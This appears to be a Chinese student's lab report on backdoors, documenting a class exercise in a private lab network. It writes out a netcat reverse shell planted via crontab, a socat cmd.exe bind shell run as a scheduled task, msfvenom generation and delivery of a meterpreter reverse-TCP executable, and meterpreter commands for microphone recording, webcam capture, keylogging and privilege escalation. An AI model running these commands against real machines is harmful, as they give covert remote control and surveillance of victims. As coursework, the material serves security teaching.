Exp2 后门原理与实践

目录


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

可能是我们点开某个链接的时候,自动加载了某个可执行文件,就类似于执行了实验中传入到windows中的backdoor.exe;也可能是我们点开某个网页时,该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • linux中可能crontab文件被修改,周期性(定时)反向连接控制主机,只要控制主机保持侦听状态,就可以周期性启动后门,控制被控主机。
  • windows中可能是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。

(3)Meterpreter有哪些给你映像深刻的功能?

能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

(4)如何发现自己有系统有没有被安装后门?

利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门。

定期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。

返回目录


实践过程记录

一、使用netcat获取主机操作Shell,cron启动

首先查看WindowsIP和LinuxIP:

  • Windows下用命令ipconfig

  • Linux下用ifconfig -a

Windows获得linux的shell:

cron启动过程如下:

  1. 先在Windows系统下,监听8888端口
  2. 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择"3";
  3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的8888端口,设置成09的原因是我当时的时间是11点07,为了能立马看到效果,所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);

4.最后运行结果如下所示:

返回目录

二、使用socat获取主机操作Shell, 任务计划启动

1.Windows+X,然后选择“控制面板”(win8下打开控制面板)

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操作”->“创建任务”

5.输入任务名

6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上

7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

8.socat - tcp:192.168.199.196:8888,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的8888端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)

返回目录

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”

2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

4.传送接收文件成功,如下图所示:

5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块,设置payload

7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8.set LHOST 192.168.20.136,这里用的是LinuxIP,和生成后门程序时指定的IP相同

9.set LPORT 8888,同样要使用相同的端口

10.开始监听

返回目录

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)

2.使用webcam_snap指令可以使用摄像头进行拍照:

3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,由于是Win8系统,提权失败:

5.其他操作:

  • 使用screenshot指令可以进行截屏
  • 用webcam stream指令可以使用摄像头进行录像
  • ……

返回目录


实验总结与体会

通过本次实验,我学会了如果对linux和windows植入后门,包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣,更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候,一定要注意不点击不靠谱链接,下载软件时尽量选择官网下载,防止下载盗版软件时被捆绑下载其他后门程序。

返回目录

20155312 张竞予 Exp2 后门原理与实践的更多相关文章

  1. 20155325 Exp2 后门原理与实践

    基础问答 例举你能想到的一个后门进入到你系统中的可能方式? 乱点链接 学电脑小白不正确配置电脑 下载非官网软件 例举你知道的后门如何启动起来(win及linux)的方式? 软件:ncat socat ...

  2. 2019-2020-3 20174318张致豪《网络对抗技术》Exp2 后门原理与实践

    Exp2 后门原理与实践 前期准备 一.实验目标与基础知识 1.1 实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell,任务计划启动 使用MSF  m ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. Exp2 后门原理与实践 20165110

    Exp2 后门原理与实践 一.实验要求 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其 ...

  5. 20145331魏澍琛《网络对抗》Exp2 后门原理与实践

    20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类 ...

  6. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  7. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  8. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  9. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

随机推荐

  1. Shell 批量修改主机 用户密码

    问题:132.121.114 和 132.121.118 网段共 48 台主机未添加基础监控,但是 wh 账户不能登录 需进行批量修改密码操作. 目前情况:op1对上述48台机器设备均能免密登录. 操 ...

  2. 逃逸分析(Escape Analysis)

    一.什么是逃逸 逃逸是指在某个方法之内创建的对象,除了在方法体之内被引用之外,还在方法体之外被其它变量引用到:这样带来的后果是在该方法执行完毕之后,该方法中创建的对象将无法被GC回收,由于其被其它变量 ...

  3. 吴裕雄 python 机器学习——Lasso回归

    import numpy as np import matplotlib.pyplot as plt from sklearn import datasets, linear_model from s ...

  4. mysql主从脚本

    #!/bin/bash #auto make install mysql AB Replication #by author ale #-- :: MYSQL_SOFT="mariadb m ...

  5. Java简单操作Zookeeper

    Zookeeper客户端链接 <dependency> <groupId>org.apache.zookeeper</groupId> <artifactId ...

  6. mybatis实现自定义typeHandler

    java8以前的日期处理有多恶心,相信不少人都深有体会.与mabatis集成查询数据库中的日期字段映射为java日期类型或者字符型的时候,会多出一个".0".当然可以自行处理.但是 ...

  7. spring 自定参数解析器(HandlerMethodArgumentResolver)

    https://blog.csdn.net/u010187242/article/details/73647670

  8. Ambari2.6.2 HDP2.6.5 大数据集群搭建

    Ambari 2.6.2 中 HDFS-2.7.3 YARN-2.7.3 HIVE-1.2.1 HBASE-1.1.2 ZOOKEEPER-3.4.6 SPARK-2.3.0 注:本文基于root用户 ...

  9. pwnable.kr-input-witeup

    查看代码,有5个stage,一一解决掉就能愉快看到flag了. 第一个stage: 解决方案: 第二个stage: 解决方案: 使用了os.pipe()函数功能,os.pipe()用于创建一个管道,返 ...

  10. 新学python画一个爱心

    from turtle import * def curvemove(): for i in range(200): right(1) forward(1) color('yellow','red') ...